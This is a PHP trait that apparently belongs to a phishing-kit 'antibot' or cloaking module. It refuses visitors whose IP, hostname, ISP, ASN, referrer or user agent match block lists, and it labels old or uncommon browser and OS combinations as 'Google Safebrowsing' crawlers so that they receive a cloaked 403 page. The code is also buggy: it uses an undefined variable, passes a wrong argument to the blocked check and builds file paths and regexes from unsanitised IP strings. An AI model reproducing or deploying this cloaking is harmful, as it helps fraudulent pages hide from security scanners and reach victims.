<?php
trait EPBlocker {
    public function blockerUnblockIP($ipaddress) {
        if (!file_exists(dirname(__FILE__) . '/../../.wexler/blocker')) @mkdir(dirname(__FILE__) . '/../../.wexler/blocker/', 0755, true);
        if (file_exists(dirname(__FILE__) . '/../../.wexler/blocker/' . $ipaddress . '.txt')) @unlink(dirname(__FILE__) . '/../../.wexler/blocker/' . $ipaddress . '.txt');
        return true;
    }
    public function blockerAddIp($data) {
        foreach (explode(",", ($data . ",")) as $key => $value) {
            $value = trim($value);
            touch(dirname(__FILE__) . '/../../.wexler/blocker/' . $value . '.txt');
            
        }
    }
    public function blockerGetAllIP() {
        if (!file_exists(dirname(__FILE__) . '/../../.wexler/blocker')) @mkdir(dirname(__FILE__) . '/../../.wexler/blocker/', 0755, true);
        
        $ip = [];
        foreach (scandir(dirname(__FILE__) . '/../../.wexler/blocker') as $key => $value) {
            if (strlen($value) > 2) {
                $ip[] = [
                    'ip' => substr($value, 0, -(strlen('.txt'))),
                    'time' => filemtime(dirname(__FILE__) . '/../../.wexler/blocker/' . $value),
                ];

            }
        }

        return $ip;
    }
    public function blockerClearAll() {
        if (!file_exists(dirname(__FILE__) . '/../../.wexler/blocker')) @mkdir(dirname(__FILE__) . '/../../.wexler/blocker/', 0755, true);
        
        
        foreach (scandir(dirname(__FILE__) . '/../../.wexler/blocker') as $key => $value) {
            if (strlen($value) > 2) {
                @unlink(dirname(__FILE__) . '/../../.wexler/blocker/' . $value);

            }
        }

        return true;
    }
    public function blockerIsBlocked($ipaddress = '') {
        return ((bool) file_exists(dirname(__FILE__) . '/../../.wexler/blocker/' . $ipaddress . '.txt'));

    }
    public function blockerBlockNow($ipaddress = '') {
        if (!file_exists(dirname(__FILE__) . '/../../.wexler/blocker')) @mkdir(dirname(__FILE__) . '/../../.wexler/blocker/', 0755, true);
        if ($this->blockerIsBlocked(dirname(__FILE__) . '/../../.wexler/blocker/' . $ipaddress . '.txt')) return true;
        
        // Log
        touch(dirname(__FILE__) . '/../../.wexler/blocker/' . $ipaddress . '.txt');
        return true;
    }
    public function blockerIsBadHostname() {
        if ($this->sessionGet('blocker_hostname_safe')) return;
        $badhostname = require(dirname(__FILE__) . '/../dataset/hostname.php');
        if (isset($this->ip['hostname'])) {
            if (!empty($this->ip['hostname'])) {
                if (is_array($badhostname)) {
                    foreach ($badhostname as $key => $value) {
                        if (strpos(strtolower($this->ip['hostname']), strtolower($value)) !== false) {
                            die($this->logMessage('Blocked because Bad Hostname (' . $value . ')')->cloakGenerate(false, 403));

                        }
                    }
                }
            }
        }
        
        // Safe
        $this->sessionSet('blocker_hostname_safe', true);
    }
    public function blockerCW() {
        $cw = require(dirname(__FILE__) . '/../dataset/cw.php');
        if (is_array($badisp)) {
            return $cw;

        }
        return [];
    }
    public function blockerIsBadISP() {
        if ($this->sessionGet('blocker_isp_safe')) return;
        $badisp = require(dirname(__FILE__) . '/../dataset/isp.php');
        if (isset($this->ip['isp'])) {
            if (!empty($this->ip['isp'])) {
                if (is_array($badisp)) {
                    foreach ($badisp as $key => $value) {
                        if (strpos(strtolower($this->ip['isp']), strtolower($value)) !== false) {
                            die($this->logMessage('Blocked because Bad ISP (' . $value . ')')->cloakGenerate(false, 403));

                        }
                    }
                }
            }
        }

        // Safe
        $this->sessionSet('blocker_isp_safe', true);
    }
    public function blockerIsBadASN() {
        if ($this->sessionGet('blocker_asn_safe')) return;
        $badasn = require(dirname(__FILE__) . '/../dataset/asn.php');
        if (isset($this->ip['asn'])) {
            if (!empty($this->ip['asn'])) {
                if (is_array($badasn)) {
                    foreach ($badasn as $key => $value) {
                        if (strpos(strtolower($this->ip['asn']), strtolower($value)) !== false) {
                            die($this->logMessage('Blocked because Bad ASN (' . $value . ')')->cloakGenerate(false, 403));

                        }
                    }
                }
            }
        }

        // Safe
        $this->sessionSet('blocker_asn_safe', true);
    }
    public function blockerIsBadReferrer() {
        if ($this->sessionGet('blocker_referrer_safe')) return;
        $badreferrer = require(dirname(__FILE__) . '/../dataset/referrer.php');
        if (isset($_SERVER['HTTP_REFERER'])) {
            if (!empty($_SERVER['HTTP_REFERER'])) {
                if (is_array($badreferrer)) {
                    foreach ($badreferrer as $key => $value) {
                        if (strpos(strtolower($_SERVER['HTTP_REFERER']), strtolower($value)) !== false) {
                            die($this->logMessage('Blocked because Bad Referrer (' . $value . ')')->cloakGenerate(false, 403));

                        }
                    }
                }
            }
        }

        // Safe
        $this->sessionSet('blocker_referrer_safe', true);
    }
    public function blockerIsBadIP() {
        if ($this->sessionGet('blocker_ip_safe')) return;
        $badip = require(dirname(__FILE__) . '/../dataset/ip.php');
        $ip = $this->ipGetAddress();
        if (is_array($badip)) {
            foreach ($badip as $key => $value) {
				if (preg_match('/' . $value . '/', $ip)) {
                    die($this->logMessage('Blocked because Bad IP (' . $value . ')')->cloakGenerate(false, 403));

                }
            }
        }

        // Safe
        $this->sessionSet('blocker_ip_safe', true);
    }
    public function blockerIsBadUseragent() {
        if ($this->sessionGet('blocker_ua_safe')) return;
        $useragent = $_SERVER['HTTP_USER_AGENT'];
        $baduseragent = require(dirname(__FILE__) . '/../dataset/useragent.php');
        $baduseragent_full = require(dirname(__FILE__) . '/../dataset/useragent_full.php');
        if (isset($useragent)) {
            if (!empty($useragent)) {
                if (is_array($baduseragent)) {
                    foreach ($baduseragent as $key => $value) {
                        if (strpos(strtolower($useragent), strtolower($value)) !== false) {
                            die($this->logMessage('Blocked because Bad Useragent (' . $value . ')')->cloakGenerate(false, 403));

                        }
                    }
                }
                if (is_array($baduseragent_full)) {
                    foreach ($baduseragent_full as $key => $value) {
                        if (strpos(strtolower($useragent), strtolower($value)) !== false) {
                            die($this->logMessage('Blocked because Bad Useragent (' . $value . ')')->cloakGenerate(false, 403));

                        }
                    }
                }
            } else {
                die($this->logMessage('Blocked because Empty Useragent [CODE: 2]')->cloakGenerate(false, 403));

            }
        } else {
            die($this->logMessage('Blocked because Empty Useragent')->cloakGenerate(false, 403));

        }

        $os = $this->browserGetOS();
        $app = $this->browserGetApplication();

        // Common UA
        $status = '';
		if ($os == "Windows Server 2003/XP x64") {
			$status = "bot";
			$detect = "Google Safebrowsing";

		}
		if ($os == "Windows XP" and $app == "Firefox") {
			$status = "bot";
			$detect = "Google Safebrowsing";

		}
		if ($os == "Windows XP" and $app == "Chrome") {
			$status = "bot";
			$detect = "Google Safebrowsing";

		}
		if ($os == "Windows Vista" or $os == "Ubuntu" or $os == "Chrome OS" or $os == "BlackBerry" or $os == "Linux") {
			$status = "bot";
			$detect = "Google Safebrowsing";

		}
		if ($app == "Internet Explorer") {
			$status = "bot";
			$detect = "Google Safebrowsing";

		}
		if ($app == "Unknown Browser") {
			$status = "bot";
			$detect = "Google Safebrowsing";

		}
		if ($os == "Windows 2000") {
			$status = "bot";
			$detect = "Google Safebrowsing";

		}
		if ($os == "Unknown OS Platform") {
			$status = "bot";
			$detect = "Google Safebrowsing";

		}
		if ($status == "bot") {
            die($this->logMessage('Blocked because Common Useragent (' . $detect . ')')->cloakGenerate(false, 403));
            
        }

        // Safe
        $this->sessionSet('blocker_ua_safe', true);
    }
}